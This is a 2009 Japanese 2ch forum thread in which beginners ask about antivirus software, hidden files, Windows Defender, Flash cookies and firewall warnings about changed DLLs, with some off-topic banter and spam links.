CNET Japan
パナソニック、業界初CLASS10対応のハイスピードSDHC/SDメモリーカード新パッケージで7月25日に発売 2009/06/15
ttp://japan.cnet.com/news/tech/story/0,2000056025,20395000,00.htm

最大転送レート22MB/sの「SDWシリーズ」として、32Gバイト、16Gバイト、8Gバイト、4Gバイト、2GバイトのSDHCメモリーカードおよび、
2GバイトのSDメモリーカード(2GバイトのみCLASS6対応)を用意した。
930名無しさん@お腹いっぱい。:2009/08/09(日) 06:52:32
>>921
> その1
ある。

> その2
ある。
ある。
931名無しさん@お腹いっぱい。:2009/08/09(日) 10:17:07
>>928
カワイソス
932923:2009/08/09(日) 12:29:25
早よ教えろやカスども!!!!!!!!!!!!!!!!
933名無しさん@お腹いっぱい。:2009/08/09(日) 13:05:49
コントロールパネルのフォルダオプションで
・対となったファイルは両方とも表示し管理は1つのファイルとして行う
・すべてのファイルとフォルダを表示する
・保護されたオペレーションシステムは表示しない

こうすれば全てのファイルが表示され
どんなウイルスでもとりあえずその存在を確認することができるのでしょうか
934名無しさん@お腹いっぱい。:2009/08/09(日) 13:09:08
それでもWindowsは隠し事をします。
935名無しさん@お腹いっぱい。:2009/08/09(日) 13:20:19
Rootkitって怖いよね。
936名無しさん@お腹いっぱい。:2009/08/09(日) 15:38:33
http://ugotfile.com/file/333121/SkyAngelBlueVol2.avi.001
http://ugotfile.com/file/333127/SkyAngelBlueVol2.avi.002
http://ugotfile.com/file/333124/SkyAngelBlueVol2.avi.003
http://ugotfile.com/file/333126/SkyAngelBlueVol2.avi.004
http://ugotfile.com/file/333152/SkyAngelBlueVol2.avi.005
http://ugotfile.com/file/333139/SkyAngelBlueVol2.avi.006
http://ugotfile.com/file/333151/SkyAngelBlueVol2.avi.007
http://ugotfile.com/file/333141/SkyAngelBlueVol2.avi.008
937名無しさん@お腹いっぱい。:2009/08/09(日) 16:58:36
>>919>>925
Winの自動実行設定をオフにしてセーフモードでPCをチェックしてみました
AVG・Spybot・WindowsDefenderすべてセーフモードでは何も検出しませんでしたが
普通に立ち上げると>>918と同じ症状ができます・・・・
WindowsDefenderの誤作動でしょうか?
せめてWindowsDefenderがどこで検知しているのかわかればいいのですが・・・・
938八頭 ◆YAGApwSaEw :2009/08/09(日) 17:44:53
>>937
SpybotとWindowsDefender(両方ともたいしたことないので)の保護機能関連設定をすべてOFFにしてから、
プログラムの追加と削除からアンインストール

「a-squared Free 4.5(←Ikarusエンジン搭載)」をインストール > Update > 通常PC起動のまま『ディープスキャン』を選択して実施
http://pc11.2ch.net/test/read.cgi/sec/1248903246/8
もし、検出があれば「検出log」をテキストだけ保存して、そのまま駆除して下さい
それでも気になるのなら>>5の*PC健康診断掲示板でチェックしてもらえばいいよ
939名無しさん@お腹いっぱい。:2009/08/09(日) 21:05:33
>>937
マルチポストなアンタは自分で解決しなさい。
940 ◆N9P3SuvBPo :2009/08/09(日) 21:58:04
なんで八頭は一部のサイトを直リンしてんの?
941名無しさん@お腹いっぱい。:2009/08/09(日) 22:12:02
なんで八頭は機種依存文字を使うの?
942八頭 ◆YAGApwSaEw :2009/08/10(月) 00:02:42
>>640
Nortonスレのことか?
最近は、罠が巧妙になって(サーチエンジンハイジャックとか)るんで安全なルートを貼ってるだけだが
943名無しさん@お腹いっぱい。:2009/08/10(月) 02:36:57
(*´ j`)ノシ
944名無しさん@お腹いっぱい。:2009/08/10(月) 03:36:21
職場の先輩から
いまどきノートンよりウィルスバスターだろ常考
みたいなこと言われたんだけどこれは事実ですか?
945名無しさん@お腹いっぱい。:2009/08/10(月) 03:44:32
カスペルスキーに決まってんだろ!常考
946名無しさん@お腹いっぱい。:2009/08/10(月) 05:22:36
>>942
被害妄想が激しい人だよね
947名無しさん@お腹いっぱい。:2009/08/10(月) 06:48:17
OS再インストールしようと思ってCD-Rにデータ移していて、
セキュリティソフトを入れてない状態でインターネットに接続してダウンロードしにいくのは危険と聞いて、
セキュリティソフトもダウンロードしてきて移したんですが、
そのときに「追加の情報が添付されてますが、この情報はコピーを続行すると失われる可能性があります」と警告が出ます。
このファイルでインストールしても大丈夫なんでしょうか?
948名無しさん@お腹いっぱい。:2009/08/10(月) 06:55:51
無問題
949名無しさん@お腹いっぱい。:2009/08/10(月) 07:13:14
>>948
即レス感謝です。
950名無しさん@お腹いっぱい。:2009/08/10(月) 23:07:50
セキュリティソフト入れてても、Windows DefenderはPC起動時のスタートアップから外さないほうが良いのでしょうか?
951 ◆N9P3SuvBPo :2009/08/11(火) 20:17:04
>>950
外さなくて良いです。
某質問掲示板でもアンインストールやFIX指示は出てませんし。
952名無しさん@お腹いっぱい。:2009/08/12(水) 00:18:07
動画ファイルをプレイヤーで読み込めたり
便利なフリーのソフトウェアで普通に機能しているというように
一見普通に動いているようでもその裏で個人情報を盗んでいる
というウイルスについて質問があります

ウイルスに感染した場合
・Cドライブ内に何らかのファイルを作成する
・怪しいプロセスがタスクマネージャで確認すると動いている
・ブラウザを乗っ取る       ・レジストリを改変する
・勝手にサーバーを立てる

上記のどの行動を行わなくともブラウザの入力履歴などの個人情報を流出させたり
システムを破壊したりするようなウイルスは存在するのでしょうか?
また上記以外の行動で流出、システム破壊等を行うウイルスはあるのでしょうか?

自分の使っているOSはXP HomeEdition sp2です
953名無しさん@お腹いっぱい。:2009/08/12(水) 00:21:37
次スレのテンプレに「八頭禁止」、もしくは、「八頭 ◆YAGApwSaEw は信用できない回答者です」という
文章を付け加えることを提案したい。

こいつの存在は、初心者に対して迷惑にしかならん。
954 ◆N9P3SuvBPo :2009/08/12(水) 01:34:25
>>952
あります。

>>953
俺はどっちでも…

今、スレ何番目?
part121かpart122だっけ?
955952:2009/08/12(水) 02:04:59
>>954
例えばどんなのがあるのですか
956名無しさん@お腹いっぱい。:2009/08/12(水) 03:04:22
無料のブログサービス使えばhtml知識なくても簡単にHPみたいなのを持てるし
商業利用だってできる

わざわざレンタル鯖借りてタグ打ちしながら時間かけてHP作る意味なくね
957名無しさん@お腹いっぱい。:2009/08/12(水) 07:15:49
●次スレ(継続スレ番修正済み)

セキュリティ初心者質問スレッドpart120
http://pc11.2ch.net/test/read.cgi/sec/1250027233/
958名無しさん@お腹いっぱい。:2009/08/12(水) 09:47:01
また「八頭」が勝手に立てたのか!
959名無しさん@お腹いっぱい。:2009/08/12(水) 20:13:18
ヴィスタですが自分のドキュメントフォルダをクリッコすると必ずパケットがうpされるんですが、何でしょうか?
960名無しさん@お腹いっぱい。:2009/08/12(水) 20:19:01
次part121じゃない?
961名無しさん@お腹いっぱい。:2009/08/13(木) 07:45:09
消化age
962名無しさん@お腹いっぱい。:2009/08/13(木) 09:35:11
カスペルスキーオンラインスキャナがずっとメンテナンス中なんだけど
いつになったら終わるの
963名無しさん@お腹いっぱい。:2009/08/13(木) 10:07:20
セキュリティ初心者質問スレッドpart119
1 :XP ◆j6XP1.2wFQ :2009/05/18(月) 11:45:59

また間違えた、ということは八頭が次スレ立てたのか!
964八頭 ◆YAGApwSaEw :2009/08/13(木) 19:19:20
冷奴どうやって食べるのが
いちばん美味い?
965名無しさん@お腹いっぱい。:2009/08/13(木) 19:22:56
6面に海苔を貼り付けて
辣油をたっぷりかけて食べる
966八頭 ◆YAGApwSaEw :2009/08/13(木) 19:46:18
>>965
6面・・・ もみ海苔にしないのはなんで?

思いつきで試してみた
冷奴+シーチキン+めんつゆ も意外とイケる
967八頭 ◆YAGApwSaEw :2009/08/13(木) 19:48:14
△冷奴+シーチキン+めんつゆ
○冷奴+シーチキン+ネギ+めんつゆ
968名無しさん@お腹いっぱい。:2009/08/13(木) 20:55:59
糞野郎!
トボケタ事言ってるんじゃないぞぉ

しかし
冷奴にキムチをのせて食べるとうまいぞ
969 ◆N9P3SuvBPo :2009/08/13(木) 21:46:54
スレ立て乙>>957
でもちょお〜っと早いんじゃないですか。

夏バテ…
970 ◆N9P3SuvBPo :2009/08/13(木) 22:24:13
こんな記事見つけた。

ユーザーが制御できない「秘密cookie」、半数強のサイトが利用
ttp://headlines.yahoo.co.jp/hl?a=20090813-00000007-zdn_ep-sci
971名無しさん@お腹いっぱい。:2009/08/13(木) 22:27:23
>>970
(ο^д^)ノシ
972八頭 ◆YAGApwSaEw :2009/08/13(木) 23:25:33
ノートン コミュニティの追跡cookieを
a-squaredが撃墜してくれました♪
973名無しさん@お腹いっぱい。:2009/08/14(金) 15:05:37
【芸能】AV男優の加藤鷹(47)がNHKのバラエティ番組撮影中に3階から転落、意識不明の重体★2
http://gimpo.2ch.net/test/read.cgi/news7/1240277978/l50
974 ◆N9P3SuvBPo :2009/08/14(金) 20:58:59
>971
φ(^_^o^_^)ノシ

次スレの>>35
抜かれる情報と言っても全然大した情報ではないので無視しとけ!
こんなのだ↓
■お客様の振込ID番号 xxxxxx
■お客様のご登録時刻 200x年xx月xx日 x時x分
■お客様のIPアドレス xxx.xxx.xxx.xxx
■お客様のリモートホスト xxxxxx.xxx.jp
■お客様のご利用プロバイダ (プロバイダの名前)
■お客様のご利用ブラウザ (ここに使用中のOSのバージョンやブラウザの種類)
■当ページ閲覧回数 x回

このような情報では、個人情報を抜くことは、まず無理。

ちなみにそのサイト行って来たけど、なんていうかページの大半がリンクになってるな。
クリックすると、「登録完了ページ」という腐ったページに飛ばされるぜ。
さらにその登録完了ページの中にある、「良くある質問」に行くと痛いことがズラリ。
975名無しさん@お腹いっぱい。:2009/08/14(金) 23:13:48
>>970
http://www.macromedia.com/support/documentation/en/flashplayer
これで設定してもだめか?
976名無しさん@お腹いっぱい。:2009/08/14(金) 23:19:09
>>974
(ο^д^)ノシ
977名無しさん@お腹いっぱい。:2009/08/15(土) 18:03:25
セキュリティの一般論で
Authenticityが成り立つということは
同時にNon-repudiationも成り立つのではないですか?
978名無しさん@お腹いっぱい。:2009/08/15(土) 19:08:17
で、何が言いたいんだ
その一般論とやらを100万回勉強し直せ←一般論はどこまでいっても一般論。

情報セキュリティ技術
社会心理学
TOEIC500 相当以上
ってどこかのセキュリティ○○のHPにあったが、P2Pやってる人間も抱えていたし
この世界、守る側より攻撃する側が有利だと気がついていないだけに哀れだ。
979 ◆N9P3SuvBPo :2009/08/15(土) 22:03:11
>975
flashのプライバシー制御って奴っすよね。
…そのFlash Cookieってやつを、その方法で制御できるのかは知らん。
とりあえず確実な情報が入るまで待て。

>976
φ(ーpー)ノシ
980名無しさん@お腹いっぱい。:2009/08/16(日) 09:02:02
【使用OS】      XP sp3
【使用ブラウザ】  IE7
【Microsoft Updateの更新の状態】 自動更新設定

Flash Playerってなくても問題ないですか?
981名無しさん@お腹いっぱい。:2009/08/16(日) 10:00:33
>>980
ニコニコやyoutubeなどの動画を観ないならなくても問題ない
もし入れるなら最新のものにアップデートする事をを忘れずに
982980:2009/08/16(日) 10:20:35
>>981
レスありがとうございます。
アップデートの仕方って
すでにインストール済の人も
初めてインストールする人みたく最新のバージョンをダウンロードするってことですか?
983名無しさん@お腹いっぱい。:2009/08/16(日) 10:23:36
専用のアンインストーラでアンインストール後、インストール
アンインストーラはadobeのサイトにある
984名無しさん@お腹いっぱい。:2009/08/16(日) 11:03:12
>>983
ありがとうございます。
ダウンロードするときって
画面の上の方にあるところ(アドオンがどうたら)と画面の下のほうだと何か違うんですか?
985 ◆N9P3SuvBPo :2009/08/16(日) 20:26:31
この辺りで次スレを立てなきゃね!
986 ◆N9P3SuvBPo :2009/08/16(日) 20:33:42
つっても、もう立ってるから次スレの案内→>>957
987名無しさん@お腹いっぱい。:2009/08/16(日) 22:48:04
消化age
988名無しさん@お腹いっぱい。:2009/08/16(日) 22:50:59
>>987
死ね
989名無しさん@お腹いっぱい。:2009/08/16(日) 23:29:27
常駐のトロイ監視・スパイウェア監視ソフト入れたほうがいいのでしょうか?
現在常駐はESETだけ使って、a-squaredを非常駐でたまにまわしているだけなんですが・・・・・
みなさんはどうしていますか?
990名無しさん@お腹いっぱい。:2009/08/17(月) 00:09:28
>>938
>>989
a-squared Free は誤検出多すぎて、あまりすすめられないわ
たとえ検出率は高くてもあれだけ誤検出を度々出すのは非常に問題
むしろ、スパイウェア対策ソフトとしては
最近欧米でも評価されているWindowsDefenderやスーパーアンチスパイウェアなんかをすすめる
991名無しさん@お腹いっぱい。:2009/08/17(月) 00:16:14
現在ウイルスバスター2009をインストールしてるんですが、WindowsDefenderも
同時に使用して問題ないでしょうか?
992名無しさん@お腹いっぱい。:2009/08/17(月) 00:49:48
WindowsDefenderっていいんですか?
993名無しさん@お腹いっぱい。:2009/08/17(月) 01:06:45
>>991
WindowsDefenderは非常駐だから問題ない
994991:2009/08/17(月) 01:22:51
>>993
ありがとうございます
995名無しさん@お腹いっぱい。:2009/08/17(月) 07:44:28
 *.dllがネットに繋いでいるとドンドン改変されたり増えたりしているようです。
 どういう仕組みで正規のものかどうかを照合するにはどうすればよいのか、
ネットの使い方の初歩について教えてください。使用OSはWIN2K SP4、Sygate
PersonalFirewall、Proxomitron、Firefoxでネット環境を作っています。
SPFのログにはネットに繋がってすぐに色々な警告が出ました。これらが正常
なことかどうか、確認方法をお伺いしたいです。以下に警告文を三つ例示
します。一度はそれぞれ変更拒否を選びましたがネットへのつながりに支障が
出たので今では以下の変更や増分を許可しています。そこに不安があります。
996995 以下事例例示:2009/08/17(月) 07:45:18
Application has changed since the last time you opened it, process id: 1112
Filename: C:\Program Files\ProxN45\Proxomitron.exe
The change was denied by user.
---- Modules changed: 0 ----
---- New modules: 2 ----
C:\WINNT\system32\crtdll.dll
C:\Program Files\ProxN45\zlib.dll

Application has changed since the last time you opened it, process id: 324
Filename: C:\Program Files\ProxN45\Proxomitron.exe
The change was denied by user.
---- Modules changed: 3 ----
C:\WINNT\system32\ADVAPI32.DLL
C:\WINNT\system32\KERNEL32.DLL
C:\WINNT\system32\NTDLL.DLL
---- New modules: 0 ----

Application has changed since the last time you opened it, process id: 324
Filename: C:\Program Files\ProxN45\Proxomitron.exe
The change was denied by user.
---- Modules changed: 6 ----
C:\WINNT\system32\RASMAN.DLL
C:\WINNT\system32\RASAPI32.DLL
C:\WINNT\system32\samlib.dll
C:\WINNT\system32\ADVAPI32.DLL
C:\WINNT\system32\KERNEL32.DLL
C:\WINNT\system32\NTDLL.DLL
---- New modules: 0 ----
997名無しさん@お腹いっぱい。:2009/08/17(月) 07:52:37
 
998名無しさん@お腹いっぱい。:2009/08/17(月) 07:52:56
 
999名無しさん@お腹いっぱい。:2009/08/17(月) 07:55:35
 
1000名無しさん@お腹いっぱい。:2009/08/17(月) 07:55:52
1000
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。